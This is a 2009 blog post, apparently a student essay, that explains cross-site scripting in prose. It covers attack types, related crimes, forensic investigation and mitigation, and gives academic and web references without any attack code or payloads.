Thursday, April 23, 2009

XSS Attacks

Cross Site Scripting (XSS)

Cross Site Scripting is a type of computer security vulnerability where a malicious third party utilizes code injections and encoding techniques to exploit a given web-site or to harvest confidential data and facilitate phishing, or to execute scripts on client’s machines. [i] One of the major issues of Cross site scripting is that the End-User is often un-aware of the attack. (Rafail)[ii] XSS is used as CSS is often confused with Cascading Style Sheets.

There are many types of XSS attacks;

Simple Persistent (Hope et al)[iii]

DOM-Based (Klien et al)[iv]

Non-Persistent[v]

Persistent[vi]

Identity Based

(Session Cookie theft and Impersonation)

Although these are known types of XSS attacks, any web-portal which allows the input of dynamic content where other users may see the posted content or a portal that relies on a database back-end i.e. Message Boards, Forums, Online Sales Listing sites etc, any of these types of site may be vulnerable to an XSS attack. XSS attacks often utilize a web-browser supported scripting language in conjunction with HTML to harvest user information or session cookies and then that gathered information is then used elsewhere. An XSS attack also has the added feature of circumnavigating most corporate security systems such as firewalls and if the site that is the host of the XSS attack is encrypted with TLS/SSL then proxies as well.


Crimes

Crimes that may leverage XSS can be fraudulent; session hijack of an online banking transaction, defamation and or slanderous; impersonating a public figure and posting to a hate related web site, and identity theft and or unauthorized access of public and private systems via browser exploit. Initial estimates place around 70% of web sites that allow user input as vulnerable.(Berinato)[vii]

Investigation Techniques

Techniques for investigating XSS do exist and include the standard methods of computer forensics however since all XSS attacks involve web-sties with dynamically generated content that is non-local and dynamically linked to the exploit; the investigation techniques used must cover databases, code analysis and general HTML. (Shiuh-Jeng et al)[viii] The most common form of forensic investigation technique used for XSS exploits is log file analysis. The procedure used is to locate the victims of the XSS attack and analyse their systems, locate the server and then from the server that is hosting the attack; locate the malicious server hosting the code of the attack, analyse that server and develop a suspect profile that also determines where else this same attack may have been used on the primary site. Depending on the severity of damage caused the police may seize all assets involved to determine the origin and mitigate any further Damage. (Shiuh-Jeng et al)[ix]

Mitigation

Mitigating cross-site scripting attacks requires action of the web-user and their browser in addition to web-site developer test and engineering: just as firewalls have become the de-facto standard to defend against unwanted network traffic; xss-filters attached to web-browsers have become standard on all popular web-browsers. Conducting Input validation tests on web-sites expecting to host forums and or content management software also mitigates the potential for XSS exploits.

References



[i] N.a. (CGISecuirty, March 2008) The Cross Site Scripting FAQ [Online] World Wide Web, Available from: http://www.cgisecurity.com/xss-faq.html (Accessed on April 24th 2009)

[ii] Rafail, Jason (CERT Coordination Center, Carnegie Mellon University 2001) Cross Site Scripting Vulnerabilities [Online] PDF Document, Available from: http://www.cert.org/archive/pdf/cross_site_scripting.pdf on (April 24th 2009)

[iii]Hope, Paco; Walther, Ben (O’Reilly Media Inc, 2008), Web Security Testing Cookbook,p. 128, ISBN 978-0-596-51483-9

[iv] Klein, Almit (Web Application Security Consortium, July 4th 2005) DOM Based Cross Site Scripting or XSS of the Third Kind [Online] World Wide Web, Available from: http://www.webappsec.org/projects/articles/071105.shtml (Accessed on April 24th 2009)

[v] N.a. (Web Application Security Consortium, 2005) Threat Classifacation [Online] World Wide Web, Available from: http://www.webappsec.org/projects/threat/classes/cross-site_scripting.shtml (Accessed on April 24th 2009)

[vi] N.a. (Web Application Security Consortium, 2005) Threat Classifacation [Online] World Wide Web, Available from: http://www.webappsec.org/projects/threat/classes/cross-site_scripting.shtml (Accessed on April 24th 2009)

[vii] Berinato, Scott (CSO, January 1st 2007) Software Vulnerability Disclosure: The Chilling Effect [Online] World Wide Web, Available from: http://www.csoonline.com/article/221113/Software_Vulnerability_Disclosure_The_Chilling_Effect?page=7 (Accessed on April 24th 2009)

[viii] Shiuh-Jeng Wang; Yao-Han Chang; Wen-Ya Chiang; Wen-Shenq Juan (IEEE, FGCN 2007) Investigations in Cross-site Script on Web-systems Gathering Digital Evidence against Cyber-Intrusions [Online] PDF Document, Available from: http://ieeexplore.ieee.org/Xplore/login.jsp?url=http%3A%2F%2Fieeexplore.ieee.org%2Fiel5%2F4426076%2F4426188%2F04426216.pdf%3Farnumber%3D4426216&authDecision=-203 (Accessed on April 24th 2009)

[ix] Siuh-Jeng, Wang; Yao-Han Chang; Hung-Jui Ke; Weng-Shenq Juang (Tiwan Central Police University, Shih Hsin University, December 9th 2007) Digital Evidence Seizure in Network Intrusions against Cyber-crime on

Internet Systems [Online] PDF Document, Available from: http://dspace.lib.fcu.edu.tw/bitstream/2377/11011/1/JOC_18_4_7.pdf (Accessed on April 24th 2009)

No comments:

Post a Comment